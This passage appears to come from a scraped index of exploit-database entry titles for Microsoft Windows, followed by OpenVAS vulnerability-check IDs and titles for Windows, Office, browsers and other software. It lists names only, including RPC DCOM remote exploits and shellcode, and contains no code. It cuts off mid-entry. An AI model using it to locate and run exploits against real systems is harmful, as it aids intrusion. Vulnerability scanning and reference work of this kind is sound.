Overflow [16748] Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) [16660] Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow [16574] Microsoft Windows Shell LNK Code Execution [16374] Microsoft Windows Authenticated User Code Execution [16366] Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) [16363] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference [16360] Microsoft Windows SMB Relay Code Execution [15839] Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption [14778] Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll) [14733] Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll) [14731] Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx) [14705] Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability [14674] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050) [14670] Microsoft Windows nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047) [14669] Microsoft Windows win32k!GreStretchBltInternal() Does Not Handle src == dest [14668] Microsoft Windows win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks [14667] Microsoft Windows KTM Invalid Free with Reused Transaction GUID (MS10-047) [14666] Microsoft Windows nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047) [14611] Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048) [14610] Microsoft Windows Tracing Registry Key ACL Privilege Escalation Vulnerability [14608] Microsoft Windows CreateWindow Function Callback Vulnerability (MS10-048) [14566] "Microsoft Windows win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow" [14403] Microsoft Windows Automatic LNK Shortcut File Code Execution [13808] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly [13532] MS Windows (DCOM RPC2) Universal Shellcode [12564] Microsoft Windows Outlook Express and Windows Mail Integer Overflow [11195] Microsoft Windows Defender ActiveX Heap Overflow PoC [10068] Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution [9301] Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit [4934] MS Windows Message Queuing Service RPC BOF Exploit (dnsname) [4745] MS Windows Message Queuing Service RPC BOF Exploit (MS07-065) [4045] Microsoft Windows Animated Cursor Stack Overflow Exploit [3737] MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4) [3453] MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption [1352] Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated) [293] MS Windows Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011) [117] MS Windows XP/2000 RPC Remote (non exec memory) Exploit [109] MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039) [103] MS Windows (RPC DCOM2) Remote Exploit (MS03-039) [100] MS Windows (RPC DCOM) Long Filename Overflow Exploit (MS03-026) [97] MS Windows (RPC DCOM) Scanner (MS03-039) [76] MS Windows (RPC DCOM) Remote Exploit (Universal Targets) [70] MS Windows (RPC DCOM) Remote Exploit (48 Targets) [69] MS Windows RPC DCOM Remote Exploit (18 Targets) [66] MS Windows (RPC DCOM) Remote Exploit (w2k+XP Targets) [64] MS Windows (RPC DCOM) Remote Buffer Overflow Exploit [61] MS Windows 2000 RPC DCOM Interface DoS Exploit [5] MS Windows RPC Locator Service Remote Exploit OpenVAS (Nessus) - http://www.openvas.org: [903041] Microsoft Windows Kernel Privilege Elevation Vulnerability (2724197) [903036] Microsoft Windows Networking Components Remote Code Execution Vulnerabilities (2733594) [903035] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2731847) [903033] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2718523) [902936] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2783534) [902933] Microsoft Windows Shell Remote Code Execution Vulnerabilities (2727528) [902916] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167) [902909] Microsoft Windows Service Pack Missing Multiple Vulnerabilities [902908] Microsoft Windows DirectWrite Denial of Service Vulnerability (2665364) [902906] Microsoft Windows DNS Server Denial of Service Vulnerability (2647170) [902900] Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584) [902846] Microsoft Windows TLS Protocol Information Disclosure Vulnerability (2655992) [902845] Microsoft Windows Shell Remote Code Execution Vulnerability (2691442) [902829] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258) [902807] Microsoft Windows Media Could Allow Remote Code Execution Vulnerabilities (2636391) [902784] Microsoft Windows Object Packager Remote Code Execution Vulnerability (2603381) [902783] Microsoft Windows Kernel Security Feature Bypass Vulnerability (2644615) [902782] MicroSoft Windows Server Service Remote Code Execution Vulnerability (921883) [902766] Microsoft Windows Kernel Privilege Elevation Vulnerability (2633171) [902694] Microsoft Windows IIS FTP Service Information Disclosure Vulnerability (2761226) [902693] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2761226) [902687] Microsoft Windows Data Access Components Remote Code Execution Vulnerability (2698365) [902677] Microsoft Windows Prtition Manager Privilege Elevation Vulnerability (2690533) [902676] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (2688338) [902609] Microsoft Windows CSRSS Privilege Escalation Vulnerabilities (2507938) [902598] Microsoft Windows Time Component Remote Code Execution Vulnerability (2618451) [902597] Microsoft Windows Media Remote Code Execution Vulnerability (2648048) [902596] Microsoft Windows OLE Remote Code Execution Vulnerability (2624667) [902588] Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability [902566] Microsoft Windows WINS Local Privilege Escalation Vulnerability (2571621) [902516] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [902487] Microsoft Windows Active Directory LDAPS Authentication Bypass Vulnerability (2630837) [902484] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (2588516) [902463] Microsoft Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2567680) [902440] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2536275) [902425] Microsoft Windows SMB Accessible Shares [902403] Microsoft Windows Fraudulent Digital Certificates Spoofing Vulnerability [902377] Microsoft Windows OLE Automation Remote Code Execution Vulnerability (2476490) [902337] Microsoft Windows Kernel Elevation of Privilege Vulnerability (2393802) [902290] Microsoft Windows Active Directory SPN Denial of Service (2478953) [902289] Microsoft Windows LSASS Privilege Escalation Vulnerability (2478960) [902281] Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910) [902280] Microsoft Windows BranchCache Remote Code Execution Vulnerability (2385678) [902277] Microsoft Windows Netlogon Service Denial of Service Vulnerability (2207559) [902276] Microsoft Windows Task Scheduler Elevation of Privilege Vulnerability (2305420) [902269] Microsoft Windows SMB Server NTLM Multiple Vulnerabilities (971468) [902263] Microsoft Windows Media Player Network Sharing Remote Code Execution Vulnerability (2281679) [902262] Microsoft Windows Shell and WordPad COM Validation Vulnerability (2405882) [902256] Microsoft Windows win32k.sys Driver 'CreateDIBPalette()' BOF Vulnerability [902232] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (978886) [902231] Microsoft Windows Tracing Feature Privilege Elevation Vulnerabilities (982799) [902227] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [902226] Microsoft Windows Shell Remote Code Execution Vulnerability (2286198) [902094] Microsoft Windows Kernel Mode Drivers Privilege Elevation Vulnerabilities (2160329) [902093] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (981852) [902067] Microsoft Windows Kernel Mode Drivers Privilege Escalation Vulnerabilities (979559) [902033] Microsoft Windows '.ani' file Denial of Service vulnerability [901305] Microsoft Windows IP-HTTPS Component Security Feature Bypass Vulnerability (2765809) [901304] Microsoft Windows File Handling Component Remote Code Execution Vulnerability (2758857) [901301] Microsoft Windows Kerberos Denial of Service Vulnerability (2743555) [901212] Microsoft Windows DirectPlay Remote Code Execution Vulnerability (2770660) [901211] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2720573) [901209] Microsoft Windows Media Center Remote Code Execution Vulnerabilities (2604926) [901205] Microsoft Windows Components Remote Code Execution Vulnerabilities (2570947) [901193] Microsoft Windows Media Remote Code Execution Vulnerabilities (2510030) [901169] Microsoft Windows Address Book Remote Code Execution Vulnerability (2423089) [901164] Microsoft Windows SChannel Denial of Service Vulnerability (2207566) [901163] Microsoft Windows Media Player Remote Code Execution Vulnerability (2378111)) [901150] Microsoft Windows Print Spooler Service Remote Code Execution Vulnerability(2347290) [901140] Microsoft Windows SMB Code Execution and DoS Vulnerabilities (982214) [901119] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (980218) [901102] Microsoft Windows Media Services Remote Code Execution Vulnerability (980858) [901065] Microsoft Windows IAS Remote Code Execution Vulnerability (974318) [901064] Microsoft Windows ADFS Remote Code Execution Vulnerability (971726) [901063] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [901048] Microsoft Windows Active Directory Denial of Service Vulnerability (973309) [901012] Microsoft Windows Media Format Remote Code Execution Vulnerability (973812) [900965] Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability [900963] Microsoft Windows Kernel Privilege Escalation Vulnerability (971486) [900957] Microsoft Windows Patterns & Practices EntLib DOS Vulnerability [900956] Microsoft Windows Patterns & Practices EntLib Version Detection [900908] Microsoft Windows Message Queuing Privilege Escalation Vulnerability (971032) [900907] Microsoft Windows AVI Media File Parsing Vulnerabilities (971557) [900886] Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (969947) [900881] Microsoft Windows Indexing Service ActiveX Vulnerability (969059) [900880] Microsoft Windows ATL COM Initialization Code Execution Vulnerability (973525) [900879] Microsoft Windows Media Player ASF Heap Overflow Vulnerability (974112) [900877] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [900876] Microsoft Windows CryptoAPI X.509 Spoofing Vulnerabilities (974571) [900873] Microsoft Windows DNS Devolution Third-Level Domain Name Resolving Weakness (971888) [900838] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (967723) [900814] Microsoft Windows WINS Remote Code Execution Vulnerability (969883) [900757] Microsoft Windows Media Player '.AVI' File DOS Vulnerability [900740] Microsoft Windows Kernel Could Allow Elevation of Privilege (977165) [900568] Microsoft Windows Search Script Execution Vulnerability (963093) [900465] Microsoft Windows DNS Memory Corruption Vulnerability - Mar09 [900404] Microsoft Windows RTCP Unspecified Remote DoS Vulnerability [900336] Microsoft Windows Media Player MID File Integer Overflow Vulnerability [900297] Microsoft Windows Kernel Denial of Service Vulnerability (2556532) [900296] Microsoft Windows TCP/IP Stack Denial of Service Vulnerability (2563894) [900295] Microsoft Windows DNS Server Remote Code Execution Vulnerability (2562485) [900281] Microsoft IE Developer Tools WMITools and Windows Messenger ActiveX Control Vulnerability (2508272) [900280] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2508429) [900266] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (2424434) [900263] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (2296199) [900248] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (981997) [900241] Microsoft Outlook Express and Windows Mail Remote Code Execution Vulnerability (978542) [900240] Microsoft Exchange and Windows SMTP Service Denial of Service Vulnerability (981832) [900237] Microsoft Windows Authentication Verification Remote Code Execution Vulnerability (981210) [900236] Microsoft Windows Kernel Could Allow Elevation of Privilege (979683) [900235] Microsoft Windows Media Player Could Allow Remote Code Execution (979402) [900232] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (975561) [900230] Microsoft Windows SMB Server Multiple Vulnerabilities (971468) [900227] Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713) [900178] Microsoft Windows 'UnhookWindowsHookEx' Local DoS Vulnerability [900173] Microsoft Windows Media Player Version Detection [900172] Microsoft Windows Media Player 'MIDI' or 'DAT' File DoS Vulnerability [900108] Microsoft Windows NSlookup.exe Remote Code Execution Vulnerability [803007] Microsoft Windows Minimum Certificate Key Length Spoofing Vulnerability (2661254) [802888] Microsoft Windows Media Service Handshake Sequence DoS Vulnerability [802677] CA ARCserve Backup RPC Services Multiple Vulnerabilities (Windows) [802634] Microsoft Windows Unauthorized Digital Certificates Spoofing Vulnerability (2718704) [802500] Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability [802426] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2647518) [802383] Microsoft Windows Color Control Panel Privilege Escalation Vulnerability [802379] Microsoft Windows Kernel 'win32k.sys' Memory Corruption Vulnerability [802260] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [802140] Microsoft Explorer HTTPS Sessions Multiple Vulnerabilities (Windows) [802136] Microsoft Windows Insecure Library Loading Vulnerability (2269637) [801991] Microsoft Windows SMB/NETBIOS NULL Session Authentication Bypass Vulnerability [801966] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2562937) [801914] Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability [801719] Microsoft Windows CSRSS CSRFinalizeContext Local Privilege Escalation Vulnerability (930178) [801718] Microsoft Windows Vista Information Disclosure Vulnerability (931213) [801717] Microsoft Windows Vista Teredo Interface Firewall Bypass Vulnerability [801716] Microsoft Outlook Express/Windows Mail MHTML URI Handler Information Disclosure Vulnerability (929123) [801713] Microsoft Outlook Express And Windows Mail NNTP Protocol Heap Buffer Overflow Vulnerability (941202) [801706] Microsoft Windows TCP/IP Remote Code Execution Vulnerabilities (941644) [801705] Microsoft Windows TCP/IP Denial of Service Vulnerability (946456) [801701] Microsoft Windows DNS Client Service Response Spoofing Vulnerability (945553) [801669] Microsoft Windows IIS FTP Server DOS Vulnerability [801598] Microsoft Windows2k3 Active Directory 'BROWSER ELECTION' Buffer Overflow Vulnerability [801580] Microsoft Windows Fax Cover Page Editor BOF Vulnerabilities [801527] Microsoft Windows 32-bit Platforms Unspecified vulnerabilities [801487] Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693) [801486] Microsoft Windows Speech Components Voice Recognition Command Execution Vulnerability (950760) [801484] Microsoft Windows IPsec Policy Processing Information Disclosure Vulnerability (953733) [801483] Microsoft Windows Search Remote Code Execution Vulnerability (959349) [801482] Microsoft Windows ASP.NET Denial of Service Vulnerability(970957) [801479] Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145) [801457] Microsoft Windows Address Book Insecure Library Loading Vulnerability [801456] Microsoft Windows Progman Group Converter Insecure Library Loading Vulnerability [801333] Microsoft Windows Kernel 'win32k.sys' Multiple DOS Vulnerabilities [801090] Microsoft Windows Indeo Codec Multiple Vulnerabilities [800862] Microsoft Windows Kernel win32k.sys Privilege Escalation Vulnerability [800687] Microsoft Windows Server 2003 OpenType Font Engine DoS Vulnerability [800577] Microsoft Windows Server 2003 win32k.sys DoS Vulnerability [800504] Microsoft Windows XP SP3 denial of service vulnerability [800480] Microsoft Windows Media Player '.mpg' Buffer Overflow Vulnerability [800466] Microsoft Windows TLS/SSL Spoofing Vulnerability (977377) [800442] Microsoft Windows GP Trap Handler Privilege Escalation Vulnerability [800332] Microsoft Windows Live Messenger Information Disclosure Vulnerability [800331] Microsoft Windows Live Messenger Client Version Detection [800328] Integer Overflow vulnerability in Microsoft Windows Media Player [800310] Microsoft Windows Media Services nskey.dll ActiveX BOF Vulnerability [800023] Microsoft Windows Image Color Management System Code Execution Vulnerability (952954) [102059] Microsoft Windows Vector Markup Language Buffer Overflow (938127) [102055] Microsoft Windows GDI Multiple Vulnerabilities (925902) [102053] Microsoft Windows Vector Markup Language Vulnerabilities (929969) [102015] Microsoft RPC Interface Buffer Overrun (KB824146) [100624] Microsoft Windows SMTP Server DNS spoofing vulnerability [100596] Microsoft Windows SMTP Server MX Record Denial of Service Vulnerability [100283] Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability [90024] Windows Vulnerability in Microsoft Jet Database Engine [11808] Microsoft RPC Interface Buffer Overrun (823980) [903037] Microsoft JScript and VBScript Engines Remote Code Execution Vulnerability (2706045) [903030] Google Chrome Multiple Vulnerabilities(02) - May 12 (Windows) [903029] Apple Safari Multiple Vulnerabilities - Oct 2011 (Windows) [903026] Microsoft Office Remote Code Execution Vulnerabilities (2663830) [903017] Microsoft Office Remote Code Execution Vulnerability (2639185) [903014] Adobe Flash Player/Air Code Execution and DoS Vulnerabilities (Windows) [903007] Google Chrome Full Sandbox Escape and Code Execution Vulnerability (Windows) [903004] Google Chrome Multiple Vulnerabilities (Windows) - Mar 12 [903003] GOM Media Player 'Open URL' Feature Unspecified Vulnerability (Windows) [903002] GOM Media Player 'AVI' File Unspecified Vulnerability (Windows) [903000] Microsoft Expression Design Remote Code Execution Vulnerability (2651018) [902934] Microsoft .NET Framework Remote Code Execution Vulnerability (2745030) [902932] Microsoft Internet Explorer Multiple Use-After-Free Vulnerabilities (2761451) [902931] Microsoft Office Remote Code Execution Vulnerabilities - 2720184 (Mac OS X) [902930] Microsoft Office Remote Code Execution Vulnerabilities (2720184) [902923] Microsoft Internet Explorer Multiple Vulnerabilities (2722913) [902922] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability (2723135) [902921] Microsoft Office Visio/Viewer Remote Code Execution Vulnerability (2733918) [902920] Microsoft Office Remote Code Execution Vulnerability (2731879) [902919] Microsoft SharePoint Privilege Elevation Vulnerabilities (2663841) [902917] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2709162) [902914] Microsoft IIS GET Request Denial of Service Vulnerability [902913] Microsoft Office Remote Code Execution Vulnerabilities-2663830 (Mac OS X) [902912] Microsoft Office Word Remote Code Execution Vulnerability-2680352 (Mac OS X) [902911] Microsoft Office Word Remote Code Execution Vulnerability (2680352) [902910] Microsoft Office Visio Viewer Remote Code Execution Vulnerability (2597981) [902907] Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2641653) [902903] Google Chrome Multiple Vulnerabilities - Jan12 (Windows) [902842] Microsoft Lync Remote Code Execution Vulnerabilities (2707956) [902841] Microsoft .NET Framework Remote Code Execution Vulnerability (2706726) [902839] Microsoft FrontPage Server Extensions MS-DOS Device Name DoS Vulnerability [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows) [902836] PHP 'com_print_typeinfo()' Remote Code Execution Vulnerability (Windows) [902833] Microsoft .NET Framework Remote Code Execution Vulnerability (2693777) [902832] MS Security Update For Microsoft Office, .NET Framework, and Silverlight (2681578) [902828] Microsoft .NET Framework Remote Code Execution Vulnerability (2671605) [902818] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerabilities (2671387) [902817] Microsoft Visual Studio Privilege Elevation Vulnerability (2651019) [902811] Microsoft .NET Framework and Microsoft Silverlight Remote Code Execution Vulnerabilities (2651026) [902810] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2660465) [902808] IBM Lotus Symphony Image Object Integer Overflow Vulnerability (Windows) [902798] Microsoft SMB Signing Enabled and Not Required At Server [902797] Microsoft SMB Signing Information Disclosure Vulnerability [902796] Microsoft IIS IP Address/Internal Network Name Disclosure Vulnerability [902792] MS Windows Indeo Codec Remote Code Execution Vulnerability (2661637) [902791] MS Windows Color Control Panel Remote Code Execution Vulnerability (2643719) [902786] Oracle VM VirtualBox Multiple Unspecified Vulnerabilities (Windows) [902785] Microsoft AntiXSS Library Information Disclosure Vulnerability (2607664) [902781] Windows Media Player Denial Of Service Vulnerability [902775] Mozilla Products Multiple Vulnerabilities - Dec 11 (Windows) [902774] Mozilla Products DOMAttrModified Memory Corruption Vulnerability (Windows) [902770] FFFTP Untrusted Search Path Vulnerability (Windows) - Dec 11 [902768] MS Windows Active Directory Remote Code Execution Vulnerability (2640045) [902767] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) [902765] Adobe Flex SDK 'SWF' Files Cross-Site Scripting Vulnerability (Windows) [902760] ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows) [902746] Microsoft Active Accessibility Remote Code Execution Vulnerability (2623699) [902738] Adobe Flash Player Multiple Vulnerabilities September-2011 (Windows) [902727] Microsoft Office Excel Remote Code Execution Vulnerabilities (2587505) [902725] Nfs-utils rpc.statd Multiple Remote Format String Vulnerabilities [902709] Adobe Air and Flash Player Multiple Vulnerabilities August-2011 (Windows) [902708] Microsoft Remote Desktop Protocol Denial of Service Vulnerability (2570222) [902705] VLC Media Player '.AVI' File BOF Vulnerability (Windows) [902704] VLC Media Player '.RM' File BOF Vulnerability (Windows) [902696] Microsoft Internet Explorer Multiple Vulnerabilities (2761465) [902692] Microsoft Office Excel ReadAV Arbitrary Code Execution Vulnerability [902689] Microsoft SQL Server Report Manager Cross Site Scripting Vulnerability (2754849) [902688] Microsoft System Center Configuration Manager XSS Vulnerability (2741528) [902686] Microsoft Internet Explorer Multiple Vulnerabilities (2719177) [902683] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability (2685939) [902682] Microsoft Internet Explorer Multiple Vulnerabilities (2699988) [902679] Google SketchUp '.SKP' File Remote Code Execution Vulnerability (Windows) [902678] Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X) [902670] Microsoft Internet Explorer Multiple Vulnerabilities (2675157) [902669] Windows Authenticode Signature Remote Code Execution Vulnerability (2653956) [902666] Opera Multiple Vulnerabilities - March12 (Windows) [902663] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerabilities (2671387) [902662] MicroSoft SMB Server Trans2 Request Remote Code Execution Vulnerability [902660] Microsoft SMB Transaction Parsing Remote Code Execution Vulnerability [902658] Microsoft RDP Server Private Key Information Disclosure Vulnerability [902657] Windows ClickOnce Application Installer Remote Code Execution Vulnerability (2584146) [902653] MS Windows C Run-Time Library Remote Code Execution Vulnerability (2654428) [902649] Microsoft Internet Explorer Multiple Vulnerabilities (2647516) [902645] Google Chrome Multiple Vulnerabilities - December11 (Windows) [902643] Windows Client/Server Run-time Subsystem Privilege Elevation Vulnerability (2620712) [902642] Microsoft Internet Explorer Multiple Vulnerabilities (2618444) [902638] Apple iTunes Remote Code Execution Vulnerability (Windows) [902635] Google Chrome V8 Remote Code Execution Vulnerability (Windows) [902626] Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048) [902625] Microsoft SharePoint Multiple Privilege Escalation Vulnerabilities (2451858) [902614] Google Chrome Secure Cookie Security Bypass Vulnerability (Windows) [902613] Microsoft Internet Explorer Multiple Vulnerabilities (2559049) [902603] VLC Media Player XSPF Playlist Integer Overflow Vulnerability (Windows) [902581] Microsoft .NET Framework and Silverlight Remote Code Execution Vulnerability (2604930) [902580] Microsoft Host Integration Server Denial of Service Vulnerabilities (2607670) [902567] Microsoft Office Remote Code Execution Vulnerabilites (2587634) [902561] McAfee SaaS Endpoint Protection Version Detection (Windows) [902552] Microsoft .NET Framework Chart Control Information Disclosure Vulnerability (2567943) [902551] Microsoft .NET Framework Information Disclosure Vulnerability (2567951) [902549] Oracle VM VirtualBox Unspecified Vulnerability (Windows) [902546] IBM Informix Dynamic Server Oninit Remote Code Execution Vulnerability (Windows) [902545] IBM Informix Dynamic Server Version Detection (Windows) [902538] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2555917) [902529] ejabberd Version Detection (Windows) [902527] ejabberd XML Parsing Denial of Service Vulnerability (Windows) [902525] Oracle Java SE Multiple Unspecified Vulnerabilities 01 - June11 (Windows) [902524] Oracle Java SE Multiple Unspecified Vulnerabilities - June11 (Windows) [902523] Microsoft .NET Framework and Silverlight Remote Code Execution Vulnerability (2514842) [902522] Microsoft .NET Framework Remote Code Execution Vulnerability (2538814) [902518] Microsoft .NET Framework Security Bypass Vulnerability [902502] Microsoft .NET Framework Remote Code Execution Vulnerability (2484015) [902501] Microsoft JScript and VBScript Scripting Engines Remote Code Execution Vulnerability (2514666) [902499] MS Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2646524) [902496] Microsoft Office IME (Chinese) Privilege Elevation Vulnerability (2652016) [902495] Microsoft Office Remote Code Execution Vulnerability (2590602) [902494] Microsoft Office Excel Remote Code Execution Vulnerability (2640241) [902493] Microsoft Publisher Remote Code Execution Vulnerabilities (2607702) [902492] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2639142) [902486] Windows Mail and Windows Meeting Space Remote Code Execution Vulnerability (2620704) [902485] Windows Kernel-Mode Drivers Remote Code Execution Vulnerability (2617657) [902483] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) [902482] MS Windows Ancillary Function Driver Privilege Elevation Vulnerability (2592799) [902477] CDE ToolTalk RPC Database Server Multiple Vulnerabilities [902464] Microsoft Visio Remote Code Execution Vulnerabilities (2560978) [902462] CA ARCserver D2D GWT RPC Request Multiple Vulnerabilities [902455] Microsoft Visio Remote Code Execution Vulnerability (2560847) [902445] Microsoft XML Editor Information Disclosure Vulnerability (2543893) [902444] MS Windows Threat Management Gateway Firewall Client Remote Code Execution Vulnerability (2520426 [902443] Microsoft Internet Explorer Multiple Vulnerabilities (2530548) [902442] MS Windows Ancillary Function Driver Privilege Elevation Vulnerability [902441] Windows MHTML Information Disclosure Vulnerability (2544893) [902430] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2545814) [902424] MS Windows Ancillary Function Driver Privilege Elevation Vulnerabilities (2645640) [902423] Microsoft Office Visio Viewer Remote Code Execution Vulnerabilities (2663510) [902411] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2489283) [902410] Microsoft Office Excel Remote Code Execution Vulnerabilities (2489279) [902409] Windows MHTML Information Disclosure Vulnerability (2503658) [902408] Windows Fax Cover Page Editor Remote Code Execution Vulnerability (2527308) [902400] Adobe Products Remote Memory Corruption Vulnerability (Windows) [902399] LibreOffice LWP File Processing Multiple Buffer Overflow Vulnerabilities (Windows) [902398] LibreOffice Version Detection (Windows) [902395] Microsoft Bluetooth Stack Remote Code Execution Vulnerability (2566220) [902392] Google Chrome Multiple Vulnerabilities (Windows) - June 11 [902387] Adobe Reader/Acrobat Security Bypass Vulnerability (Windows) [902382] Google Chrome Multiple Vulnerabilities May11 (Windows) [902379] Adobe Reader/Acrobat Memory Corruption Vulnerability (Windows) [902378] Microsoft Office Excel Remote Code Execution Vulnerabilities (2537146) [902373] Adobe Audition '.ses' Multiple Buffer Overflow Vulnerabilities (Windows) [902365] Microsoft GDI+ Remote Code Execution Vulnerability (2489979) [902364] Microsoft Office Remote Code Execution Vulnerabilites (2489293) [902363] Windows OpenType Compact Font Format (CFF) Driver Remote Code Execution Vulnerability (2507618) [902353] Oracle Java SE Code Execution Vulnerabilities (Windows) [902351] Microsoft Groove Remote Code Execution Vulnerability (2494047) [902350] Oracle Java SE Code Execution Vulnerability (Windows-01) [902349] Oracle Java SE Code Execution Vulnerability (Windows) [902347] Oracle Java SE Multiple Unspecified Vulnerabilities (Windows) [902344] Oracle Java SE Multiple Unspecified Vulnerabilities (Windows) [902341] VLC Media Player USF and Text Subtitles Decoders BOF Vulnerabilities (Windows) [902340] VLC Media Player '.mkv' Code Execution Vulnerability (Windows) [902336] Microsoft JScript and VBScript Scripting Engines Information Disclosure Vulnerability (2475792) [902334] Vulnerability in Windows Shell Graphics Processing Could Allow Remote Code Execution (2483185) [902333] Tor Unspecified Heap Based Buffer Overflow Vulnerability (Windows) [902325] Microsoft Internet Explorer 'CSS Import Rule' Use-after-free Vulnerability [902324] Microsoft SharePoint Could Allow Remote Code Execution Vulnerability (2455005) [902323] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (981957) [902322] Windows Local Procedure Call Privilege Elevation Vulnerability (2360937) [902319] Microsoft Foundation Classes Could Allow Remote Code Execution Vulnerability (2387149) [902306] Mozilla Products 'js_InitRandom' Information Disclosure Vulnerability (Windows) [902305] Mozilla Firefox Information Disclosure Vulnerability (Windows) [902303] Adobe Products Content Code Execution Vulnerability (Windows) [902301] Windows Client/Server Runtime Subsystem Privilege Elevation Vulnerability (2121546) [902293] Metasploit Framework Version Detection (Windows) [902288] Microsoft Kerberos Privilege Escalation Vulnerabilities (2496930) [902287] Microsoft Visio Remote Code Execution Vulnerabilities (2451879) [902285] Microsoft Internet Explorer Information Disclosure Vulnerability (2501696) [902278] MS Windows ICSW Remote Code Execution Vulnerability (2443105) [902275] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2436673) [902274] Microsoft Publisher Remote Code Execution Vulnerability (2292970) [902265] Microsoft Office Word Remote Code Execution Vulnerabilities (2293194) [902264] Microsoft Office Excel Remote Code Execution Vulnerabilities (2293211) [902255] Microsoft Visual Studio Insecure Library Loading Vulnerability [902254] Microsoft Office Products Insecure Library Loading Vulnerability [902250] Microsoft Word 2003 'MSO.dll' Null Pointer Dereference Vulnerability [902246] Microsoft Internet Explorer 'toStaticHTML()' Cross Site Scripting Vulnerability [902243] Microsoft Outlook TNEF Remote Code Execution Vulnerability (2315011) [902242] Mozilla Products Insecure Library Loading Vulnerability (Windows) [902239] Wireshark File Opening Insecure Library Loading Vulnerability (Windows) [902238] Skype Insecure Library Loading Vulnerability (Windows) [902230] Microsoft .NET Common Language Runtime Remote Code Execution Vulnerability (2265906) [902229] Microsoft Window MPEG Layer-3 Remote Code Execution Vulnerability (2115168) [902228] Microsoft Office Word Remote Code Execution Vulnerabilities (2269638) [902217] Microsoft Outlook SMB Attachment Remote Code Execution Vulnerability (978212) [902210] Microsoft IE cross-domain IFRAME gadgets keystrokes steal Vulnerability [902204] Mozilla Products Multiple Vulnerabilities june-10 (Windows) [902203] Opera Browser Multiple Vulnerabilities (Windows) [902197] Wireshark SMB PIPE Dissector Denial of Service Vulnerability (Windows) [902196] Wireshark SMB dissector Denial of Service Vulnerability (Windows) [902195] Wireshark ASN.1 BER 